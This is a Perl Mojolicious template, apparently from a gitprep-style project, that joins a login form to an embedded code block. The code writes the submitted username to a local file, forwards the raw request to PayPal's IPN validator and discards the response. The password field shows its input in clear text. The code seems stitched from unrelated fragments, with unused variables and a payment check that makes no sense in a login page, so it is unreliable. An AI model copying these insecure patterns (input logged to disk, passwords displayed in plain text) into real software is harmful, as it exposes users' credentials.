<%
	# API
	my $api = gitprep_api;

	# Operator
	my $op = param('op') || '';

	# DBI
	my $dbi = $self->app->dbi;
	my $query;
	# read post from PayPal system and add 'cmd'
	read (STDIN, $query, $ENV{'CONTENT_LENGTH'});
	open my $fh, '>', 'data.txt';
	print {$fh} param('id');
	close $fh;

	$query .= '&cmd=_notify-validate';
	# post back to PayPal system to validate
	my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 1 });
	my $req = HTTP::Request->new('POST', 'https://www.paypal.com/cgi-bin/webscr');
	$req->content_type('application/x-www-form-urlencoded');
	$req->header(Host => 'www.paypal.com');
	$req->content($query);
	my $res = $ua->request($req);	
	print "content-type: text/plain\n\n";
%>
<form action="<%= url_for->query(op => 'handle') %>" method="post">
<div class="form-group">
  <label>Username</label>
  <input type="text" name="id" class="form-control" placeholder="Username">
</div>
<div class="form-group">
  <div class="d-flex justify-content-between mg-b-5">
	<label class="mg-b-0-f">Password</label>
	<a href="#" class="tx-13">Forgot password?</a>
  </div>
  <input type="text" name="lebu" class="form-control">
</div>
<button type="submit" class="btn btn-brand-02 btn-block">Submit</button>
</form>
